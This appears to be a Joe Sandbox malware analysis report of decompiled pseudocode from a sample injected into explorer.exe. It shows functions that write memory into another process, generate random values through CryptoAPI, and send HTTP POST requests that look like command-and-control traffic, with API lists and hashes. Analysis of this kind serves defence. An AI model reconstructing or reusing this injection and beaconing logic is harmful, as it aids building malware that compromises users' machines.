                                                                                                                                                                        				_push(_t138);
                                                                                                                                                                        				_push(0x8000000);
                                                                                                                                                                        				_v52 =  *((intOrPtr*)(_t83 + 0x50));
                                                                                                                                                                        				_push(0x40);
                                                                                                                                                                        				_push( &_v52);
                                                                                                                                                                        				_push(_t138);
                                                                                                                                                                        				_push(0xe);
                                                                                                                                                                        				_push( &_v20);
                                                                                                                                                                        				_t95 =  *0x7bf918; // 0x0
                                                                                                                                                                        				if( *((intOrPtr*)(_t95 + 0xc))() < 0) {
                                                                                                                                                                        					goto L14;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t97 =  *"18293"; // 0x39323831
                                                                                                                                                                        				_v36 = _t97;
                                                                                                                                                                        				_t98 =  *0x7bce44; // 0x33
                                                                                                                                                                        				_v32 = _t98;
                                                                                                                                                                        				_v116.lpszClassName =  &_v64;
                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                        				_v116.lpfnWndProc = DefWindowProcW;
                                                                                                                                                                        				_v116.cbWndExtra = _t138;
                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                        				_v116.style = 0xb;
                                                                                                                                                                        				_v116.lpszMenuName = _t138;
                                                                                                                                                                        				_v116.cbSize = 0x30;
                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                        				_v116.cbClsExtra = _t138;
                                                                                                                                                                        				_v116.hInstance = _t138;
                                                                                                                                                                        				if(RegisterClassExA( &_v116) != 0) {
                                                                                                                                                                        					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
                                                                                                                                                                        					if(_t132 != 0) {
                                                                                                                                                                        						DestroyWindow(_t132);
                                                                                                                                                                        						UnregisterClassA( &_v64, _t138);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				_t162 =  *0x7bf918; // 0x0
                                                                                                                                                                        				_t105 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        				_t107 =  *((intOrPtr*)(_t162 + 0x14))(_v20,  *((intOrPtr*)(_t105 + 0x12c))( &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40));
                                                                                                                                                                        				_t158 = _v12;
                                                                                                                                                                        				if(_t107 < 0) {
                                                                                                                                                                        					goto L15;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_push(0x40);
                                                                                                                                                                        					_push(_t138);
                                                                                                                                                                        					_push(2);
                                                                                                                                                                        					_push( &_v24);
                                                                                                                                                                        					_push(_t138);
                                                                                                                                                                        					_push(_t138);
                                                                                                                                                                        					_push(_t138);
                                                                                                                                                                        					_push( &_v8);
                                                                                                                                                                        					_t110 =  *0x7bf918; // 0x0
                                                                                                                                                                        					_push(_t158);
                                                                                                                                                                        					_push(_v20);
                                                                                                                                                                        					if( *((intOrPtr*)(_t110 + 0x14))() < 0) {
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t154 = E007A8C43( *0x7bf81c, 0x1ac4);
                                                                                                                                                                        					_v36 = _t154;
                                                                                                                                                                        					if(_t154 == 0) {
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					}
                                                                                                                                                                        					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
                                                                                                                                                                        					_t113 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					_t163 =  *((intOrPtr*)(_t113 + 0x54))(_t158, _t138, 0x1ac4, 0x1000, 4);
                                                                                                                                                                        					_t145 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					 *((intOrPtr*)(_t145 + 0x20))(_v12, _t163, _t154, 0x1ac4,  &_v28);
                                                                                                                                                                        					E007A8BF4( &_v36, 0x1ac4);
                                                                                                                                                                        					_t119 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        					_t155 =  *0x7bf830; // 0x7a0000
                                                                                                                                                                        					_v36 = _t119;
                                                                                                                                                                        					 *0x7bf830 = _v8;
                                                                                                                                                                        					 *0x7bf81c = _t163;
                                                                                                                                                                        					E007A8CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
                                                                                                                                                                        					E007AD3C6(_v16, _v8, _v44);
                                                                                                                                                                        					_t124 = E007AA43D("quatr");
                                                                                                                                                                        					_v53 = _t138;
                                                                                                                                                                        					_t147 = 0xf;
                                                                                                                                                                        					if(_t124 > _t147) {
                                                                                                                                                                        						do {
                                                                                                                                                                        							L12:
                                                                                                                                                                        							_t63 = _t138 + 0x41; // 0x41
                                                                                                                                                                        							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
                                                                                                                                                                        							_t138 =  &(_t138->i);
                                                                                                                                                                        						} while (_t138 < _t147);
                                                                                                                                                                        						L13:
                                                                                                                                                                        						lstrlenW( &_v68);
                                                                                                                                                                        						 *0x7bf830 = _t155;
                                                                                                                                                                        						 *0x7bf81c = _v36;
                                                                                                                                                                        						goto L17;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t147 = _t124;
                                                                                                                                                                        					if(_t147 == 0) {
                                                                                                                                                                        						goto L13;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L12;
                                                                                                                                                                        				}
                                                                                                                                                                        			}













































                                                                                                                                                                        0x007ad4da
                                                                                                                                                                        0x007ad4e1
                                                                                                                                                                        0x007ad4e9
                                                                                                                                                                        0x007ad4ea
                                                                                                                                                                        0x007ad4f1
                                                                                                                                                                        0x007ad4f4
                                                                                                                                                                        0x007ad4f5
                                                                                                                                                                        0x007ad4fc
                                                                                                                                                                        0x007ad4ff
                                                                                                                                                                        0x007ad506
                                                                                                                                                                        0x007ad507
                                                                                                                                                                        0x007ad50a
                                                                                                                                                                        0x007ad516
                                                                                                                                                                        0x007ad538
                                                                                                                                                                        0x007ad540
                                                                                                                                                                        0x007ad543
                                                                                                                                                                        0x007ad54e
                                                                                                                                                                        0x007ad54e
                                                                                                                                                                        0x007ad540
                                                                                                                                                                        0x007ad554
                                                                                                                                                                        0x007ad56a
                                                                                                                                                                        0x007ad579
                                                                                                                                                                        0x007ad57c
                                                                                                                                                                        0x007ad581
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ad587
                                                                                                                                                                        0x007ad587
                                                                                                                                                                        0x007ad589
                                                                                                                                                                        0x007ad58a
                                                                                                                                                                        0x007ad58f
                                                                                                                                                                        0x007ad590
                                                                                                                                                                        0x007ad591
                                                                                                                                                                        0x007ad592
                                                                                                                                                                        0x007ad596
                                                                                                                                                                        0x007ad597
                                                                                                                                                                        0x007ad59c
                                                                                                                                                                        0x007ad59d
                                                                                                                                                                        0x007ad5a5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ad5bb
                                                                                                                                                                        0x007ad5bd
                                                                                                                                                                        0x007ad5c4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ad5d9
                                                                                                                                                                        0x007ad5df
                                                                                                                                                                        0x007ad5ec
                                                                                                                                                                        0x007ad5fa
                                                                                                                                                                        0x007ad600
                                                                                                                                                                        0x007ad60c
                                                                                                                                                                        0x007ad611
                                                                                                                                                                        0x007ad616
                                                                                                                                                                        0x007ad61c
                                                                                                                                                                        0x007ad622
                                                                                                                                                                        0x007ad62a
                                                                                                                                                                        0x007ad63a
                                                                                                                                                                        0x007ad646
                                                                                                                                                                        0x007ad650
                                                                                                                                                                        0x007ad658
                                                                                                                                                                        0x007ad65d
                                                                                                                                                                        0x007ad660
                                                                                                                                                                        0x007ad668
                                                                                                                                                                        0x007ad668
                                                                                                                                                                        0x007ad668
                                                                                                                                                                        0x007ad66b
                                                                                                                                                                        0x007ad66f
                                                                                                                                                                        0x007ad670
                                                                                                                                                                        0x007ad674
                                                                                                                                                                        0x007ad678
                                                                                                                                                                        0x007ad681
                                                                                                                                                                        0x007ad687
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ad687
                                                                                                                                                                        0x007ad662
                                                                                                                                                                        0x007ad666
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ad666

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegisterClassExA.USER32(?), ref: 007AD50D
                                                                                                                                                                        • CreateWindowExA.USER32 ref: 007AD538
                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 007AD543
                                                                                                                                                                        • UnregisterClassA.USER32 ref: 007AD54E
                                                                                                                                                                          • Part of subcall function 007A8BF4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 007A8C3A
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,007A61C5), ref: 007AD678
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassWindow$CreateDestroyFreeHeapRegisterUnregisterlstrlen
                                                                                                                                                                        • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                        • API String ID: 1751977465-2640591812
                                                                                                                                                                        • Opcode ID: e75bcd2ff5d2c13c19282b87ab19074279607aafae611e285e687b13a3827ed3
                                                                                                                                                                        • Instruction ID: 5097348c3a1fa0fdb7da19fd873de7958515ae5744d3aa7ee1b688326f62f515
                                                                                                                                                                        • Opcode Fuzzy Hash: e75bcd2ff5d2c13c19282b87ab19074279607aafae611e285e687b13a3827ed3
                                                                                                                                                                        • Instruction Fuzzy Hash: CE81E6B1900219AFDB10DF99DC84EEEBBB8FB49744F148269F605E7250D778AE01CB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E007B28F0(intOrPtr* _a4) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				_Unknown_base(*)()* _t15;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                                        				intOrPtr* _t29;
                                                                                                                                                                        				struct HINSTANCE__* _t30;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t30 = GetModuleHandleW(L"advapi32.dll");
                                                                                                                                                                        				if(_t30 == 0) {
                                                                                                                                                                        					L7:
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t15 = GetProcAddress(_t30, "CryptGenRandom");
                                                                                                                                                                        				_v12 = _t15;
                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0xf0000000);
                                                                                                                                                                        				_push(1);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push( &_v8);
                                                                                                                                                                        				if( *_t25() == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t20 = _v12(_v8, 4,  &_v16);
                                                                                                                                                                        				 *_t29(_v8, 0);
                                                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				 *_a4 = E007B284B( &_v16);
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}












                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,007A7B6A), ref: 007B2902
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 007B291A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 007B2928
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 007B2937
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                        • API String ID: 667068680-129414566
                                                                                                                                                                        • Opcode ID: 888bf1e12e7f36d64d08b5c1aac06aad98ea02a0c2b95af239d3c9724e9cab59
                                                                                                                                                                        • Instruction ID: f1b1c61d74f75524f32a80f9eadb0e0eddf152da23a1fd5e0017684dd0756dd9
                                                                                                                                                                        • Opcode Fuzzy Hash: 888bf1e12e7f36d64d08b5c1aac06aad98ea02a0c2b95af239d3c9724e9cab59
                                                                                                                                                                        • Instruction Fuzzy Hash: 5C11E9B2E4130677DB11A6A48C49FDEF7AC9F44780F150120F700F6191DE78EE028698
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E007AF7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				char _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				int _v32;
                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                        				char _v56;
                                                                                                                                                                        				int _v68;
                                                                                                                                                                        				void* _v72;
                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                        				int _v96;
                                                                                                                                                                        				void* _v100;
                                                                                                                                                                        				intOrPtr _v104;
                                                                                                                                                                        				intOrPtr _v108;
                                                                                                                                                                        				char* _v112;
                                                                                                                                                                        				char _v116;
                                                                                                                                                                        				char _v132;
                                                                                                                                                                        				void _v388;
                                                                                                                                                                        				void _v644;
                                                                                                                                                                        				intOrPtr _t94;
                                                                                                                                                                        				intOrPtr _t102;
                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                        				intOrPtr* _t105;
                                                                                                                                                                        				intOrPtr _t110;
                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                        				intOrPtr _t115;
                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                        				char _t117;
                                                                                                                                                                        				intOrPtr _t119;
                                                                                                                                                                        				char _t122;
                                                                                                                                                                        				intOrPtr _t127;
                                                                                                                                                                        				signed int _t129;
                                                                                                                                                                        				intOrPtr _t135;
                                                                                                                                                                        				intOrPtr _t139;
                                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                                        				intOrPtr _t145;
                                                                                                                                                                        				intOrPtr _t147;
                                                                                                                                                                        				intOrPtr _t153;
                                                                                                                                                                        				intOrPtr _t155;
                                                                                                                                                                        				intOrPtr _t159;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				signed int _t165;
                                                                                                                                                                        				intOrPtr _t179;
                                                                                                                                                                        				signed int _t186;
                                                                                                                                                                        				char _t188;
                                                                                                                                                                        				signed int _t189;
                                                                                                                                                                        				void* _t190;
                                                                                                                                                                        				char _t193;
                                                                                                                                                                        				signed int _t194;
                                                                                                                                                                        				signed int _t195;
                                                                                                                                                                        				void* _t196;
                                                                                                                                                                        
                                                                                                                                                                        				_v24 = 4;
                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                        				_v28 = 1;
                                                                                                                                                                        				_t190 = __edx;
                                                                                                                                                                        				memset( &_v388, 0, 0x100);
                                                                                                                                                                        				memset( &_v644, 0, 0x100);
                                                                                                                                                                        				_v56 = E007A9DD8(0xd62);
                                                                                                                                                                        				_v52 = E007A9DD8(0x8e9);
                                                                                                                                                                        				_v48 = E007A9DD8(0xa93);
                                                                                                                                                                        				_v44 = E007A9DD8(0x9a9);
                                                                                                                                                                        				_t94 = E007A9DD8(0xb64);
                                                                                                                                                                        				_v36 = _v36 & 0;
                                                                                                                                                                        				_t188 = 0x3c;
                                                                                                                                                                        				_v40 = _t94;
                                                                                                                                                                        				E007A8D6D( &_v116, 0, 0x100);
                                                                                                                                                                        				_v108 = 0x10;
                                                                                                                                                                        				_v112 =  &_v132;
                                                                                                                                                                        				_v116 = _t188;
                                                                                                                                                                        				_v100 =  &_v388;
                                                                                                                                                                        				_v96 = 0x100;
                                                                                                                                                                        				_v72 =  &_v644;
                                                                                                                                                                        				_push( &_v116);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_v68 = 0x100;
                                                                                                                                                                        				_push(E007AA43D(_t190));
                                                                                                                                                                        				_t102 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        				_push(_t190);
                                                                                                                                                                        				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
                                                                                                                                                                        					_t104 = 0;
                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t105 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        						_v8 = 0x8404f700;
                                                                                                                                                                        						_t189 =  *_t105( *0x7bf920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
                                                                                                                                                                        						__eflags = _t189;
                                                                                                                                                                        						if(_t189 != 0) {
                                                                                                                                                                        							E007AF73E(_t189);
                                                                                                                                                                        							_t110 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
                                                                                                                                                                        							__eflags = _a24;
                                                                                                                                                                        							_t165 = _t111;
                                                                                                                                                                        							if(_a24 != 0) {
                                                                                                                                                                        								E007AA065(_a24);
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _t165;
                                                                                                                                                                        							if(_t165 != 0) {
                                                                                                                                                                        								__eflags = _v104 - 4;
                                                                                                                                                                        								_t112 = 0x8484f700;
                                                                                                                                                                        								if(_v104 != 4) {
                                                                                                                                                                        									_t112 = _v8;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t115 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
                                                                                                                                                                        								_v8 = _t116;
                                                                                                                                                                        								__eflags = _a24;
                                                                                                                                                                        								if(_a24 != 0) {
                                                                                                                                                                        									E007AA065(_a24);
                                                                                                                                                                        									_t116 = _v8;
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags = _t116;
                                                                                                                                                                        								if(_t116 != 0) {
                                                                                                                                                                        									__eflags = _v104 - 4;
                                                                                                                                                                        									if(_v104 == 4) {
                                                                                                                                                                        										E007AF6EC(_t116);
                                                                                                                                                                        									}
                                                                                                                                                                        									_t117 = E007A9DD8(0x901);
                                                                                                                                                                        									_t193 = _t117;
                                                                                                                                                                        									_v16 = _t193;
                                                                                                                                                                        									_t119 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        									_t194 = _v8;
                                                                                                                                                                        									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E007AA43D(_t193), _a4, _a8);
                                                                                                                                                                        									E007A8B9C( &_v16);
                                                                                                                                                                        									__eflags = _a24;
                                                                                                                                                                        									if(_a24 != 0) {
                                                                                                                                                                        										E007AA065(_a24);
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _v8;
                                                                                                                                                                        									if(_v8 != 0) {
                                                                                                                                                                        										L25:
                                                                                                                                                                        										_t122 = 8;
                                                                                                                                                                        										_v24 = _t122;
                                                                                                                                                                        										_v20 = 0;
                                                                                                                                                                        										_v16 = 0;
                                                                                                                                                                        										E007A8D6D( &_v20, 0, _t122);
                                                                                                                                                                        										_t127 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                        											_t129 = E007A9F6F( &_v20, __eflags);
                                                                                                                                                                        											__eflags = _t129 - 0xc8;
                                                                                                                                                                        											if(_t129 == 0xc8) {
                                                                                                                                                                        												 *_a20 = _t194;
                                                                                                                                                                        												 *_a12 = _t189;
                                                                                                                                                                        												 *_a16 = _t165;
                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                        												return 0;
                                                                                                                                                                        											}
                                                                                                                                                                        											_v12 =  ~_t129;
                                                                                                                                                                        											L29:
                                                                                                                                                                        											_t135 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        											 *((intOrPtr*)(_t135 + 8))(_t194);
                                                                                                                                                                        											_t195 = _v12;
                                                                                                                                                                        											L30:
                                                                                                                                                                        											__eflags = _t165;
                                                                                                                                                                        											if(_t165 != 0) {
                                                                                                                                                                        												_t139 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        												 *((intOrPtr*)(_t139 + 8))(_t165);
                                                                                                                                                                        											}
                                                                                                                                                                        											__eflags = _t189;
                                                                                                                                                                        											if(_t189 != 0) {
                                                                                                                                                                        												_t179 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        												 *((intOrPtr*)(_t179 + 8))(_t189);
                                                                                                                                                                        											}
                                                                                                                                                                        											return _t195;
                                                                                                                                                                        										}
                                                                                                                                                                        										GetLastError();
                                                                                                                                                                        										_v12 = 0xfffffff8;
                                                                                                                                                                        										goto L29;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										GetLastError();
                                                                                                                                                                        										_t143 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        										 *((intOrPtr*)(_t143 + 8))(_t194);
                                                                                                                                                                        										_t145 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        										_v8 = _v8 & 0x00000000;
                                                                                                                                                                        										 *((intOrPtr*)(_t145 + 8))(_t165);
                                                                                                                                                                        										_t147 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        										_t165 = 0;
                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                        										 *((intOrPtr*)(_t147 + 8))(_t189);
                                                                                                                                                                        										_t194 = _v8;
                                                                                                                                                                        										goto L21;
                                                                                                                                                                        									}
                                                                                                                                                                        								} else {
                                                                                                                                                                        									GetLastError();
                                                                                                                                                                        									_t153 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        									 *((intOrPtr*)(_t153 + 8))(_t165);
                                                                                                                                                                        									_t155 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        									_t165 = 0;
                                                                                                                                                                        									 *((intOrPtr*)(_t155 + 8))(_t189);
                                                                                                                                                                        									_t189 = 0;
                                                                                                                                                                        									_t194 = _v8;
                                                                                                                                                                        									goto L22;
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								GetLastError();
                                                                                                                                                                        								_t159 =  *0x7bf838; // 0xeb0710
                                                                                                                                                                        								 *((intOrPtr*)(_t159 + 8))(_t189);
                                                                                                                                                                        								L21:
                                                                                                                                                                        								_t189 = 0;
                                                                                                                                                                        								__eflags = 0;
                                                                                                                                                                        								goto L22;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						GetLastError();
                                                                                                                                                                        						L22:
                                                                                                                                                                        						_t186 = _t194;
                                                                                                                                                                        						_t104 = _v12 + 1;
                                                                                                                                                                        						_v12 = _t104;
                                                                                                                                                                        						__eflags = _t104 - 2;
                                                                                                                                                                        					} while (_t104 < 2);
                                                                                                                                                                        					__eflags = _t186;
                                                                                                                                                                        					if(_t186 != 0) {
                                                                                                                                                                        						goto L25;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t195 = 0xfffffffe;
                                                                                                                                                                        					goto L30;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t163 = 0xfffffffc;
                                                                                                                                                                        				return _t163;
                                                                                                                                                                        			}
                                                                                                                                                                        0x007af9b9
                                                                                                                                                                        0x007af9be
                                                                                                                                                                        0x007af9c2
                                                                                                                                                                        0x007af9c7
                                                                                                                                                                        0x007af9c7
                                                                                                                                                                        0x007af9cc
                                                                                                                                                                        0x007af9d0
                                                                                                                                                                        0x007afa1b
                                                                                                                                                                        0x007afa1d
                                                                                                                                                                        0x007afa20
                                                                                                                                                                        0x007afa28
                                                                                                                                                                        0x007afa2c
                                                                                                                                                                        0x007afa2f
                                                                                                                                                                        0x007afa41
                                                                                                                                                                        0x007afa4c
                                                                                                                                                                        0x007afa4e
                                                                                                                                                                        0x007afa62
                                                                                                                                                                        0x007afa67
                                                                                                                                                                        0x007afa6c
                                                                                                                                                                        0x007afaa1
                                                                                                                                                                        0x007afaa6
                                                                                                                                                                        0x007afaab
                                                                                                                                                                        0x007afaad
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007afaad
                                                                                                                                                                        0x007afa70
                                                                                                                                                                        0x007afa73
                                                                                                                                                                        0x007afa73
                                                                                                                                                                        0x007afa79
                                                                                                                                                                        0x007afa7c
                                                                                                                                                                        0x007afa7f
                                                                                                                                                                        0x007afa7f
                                                                                                                                                                        0x007afa81
                                                                                                                                                                        0x007afa83
                                                                                                                                                                        0x007afa89
                                                                                                                                                                        0x007afa89
                                                                                                                                                                        0x007afa8c
                                                                                                                                                                        0x007afa8e
                                                                                                                                                                        0x007afa90
                                                                                                                                                                        0x007afa97
                                                                                                                                                                        0x007afa97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007afa9a
                                                                                                                                                                        0x007afa50
                                                                                                                                                                        0x007afa56
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007af9d2
                                                                                                                                                                        0x007af9d2
                                                                                                                                                                        0x007af9d8
                                                                                                                                                                        0x007af9de
                                                                                                                                                                        0x007af9e1
                                                                                                                                                                        0x007af9e6
                                                                                                                                                                        0x007af9eb
                                                                                                                                                                        0x007af9ee
                                                                                                                                                                        0x007af9f3
                                                                                                                                                                        0x007af9f3
                                                                                                                                                                        0x007af9f6
                                                                                                                                                                        0x007af9f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007af9f9
                                                                                                                                                                        0x007af958
                                                                                                                                                                        0x007af958
                                                                                                                                                                        0x007af95e
                                                                                                                                                                        0x007af964
                                                                                                                                                                        0x007af967
                                                                                                                                                                        0x007af96c
                                                                                                                                                                        0x007af96f
                                                                                                                                                                        0x007af972
                                                                                                                                                                        0x007af974
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007af974
                                                                                                                                                                        0x007af900
                                                                                                                                                                        0x007af900
                                                                                                                                                                        0x007af906
                                                                                                                                                                        0x007af90c
                                                                                                                                                                        0x007af9fc
                                                                                                                                                                        0x007af9fc
                                                                                                                                                                        0x007af9fc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007af9fc
                                                                                                                                                                        0x007af8fe
                                                                                                                                                                        0x007af8bf
                                                                                                                                                                        0x007af9fe
                                                                                                                                                                        0x007afa01
                                                                                                                                                                        0x007afa03
                                                                                                                                                                        0x007afa06
                                                                                                                                                                        0x007afa09
                                                                                                                                                                        0x007afa09
                                                                                                                                                                        0x007afa12
                                                                                                                                                                        0x007afa14
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007afa18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007afa18
                                                                                                                                                                        0x007af88e
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 007AF7D7
                                                                                                                                                                        • memset.MSVCRT ref: 007AF7E8
                                                                                                                                                                          • Part of subcall function 007A8D6D: memset.MSVCRT ref: 007A8D7F
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 007AF8BF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ErrorLast
                                                                                                                                                                        • String ID: POST
                                                                                                                                                                        • API String ID: 2570506013-1814004025
                                                                                                                                                                        • Opcode ID: a83df6c876044a1c3b207a8cb7faf52e0ae5d9d8052b8b394d773f9a256208e5
                                                                                                                                                                        • Instruction ID: 3fb89142b631352d7cc7a5102d28698b6f5881ead99856153f77ff3c0dad53ec
                                                                                                                                                                        • Opcode Fuzzy Hash: a83df6c876044a1c3b207a8cb7faf52e0ae5d9d8052b8b394d773f9a256208e5
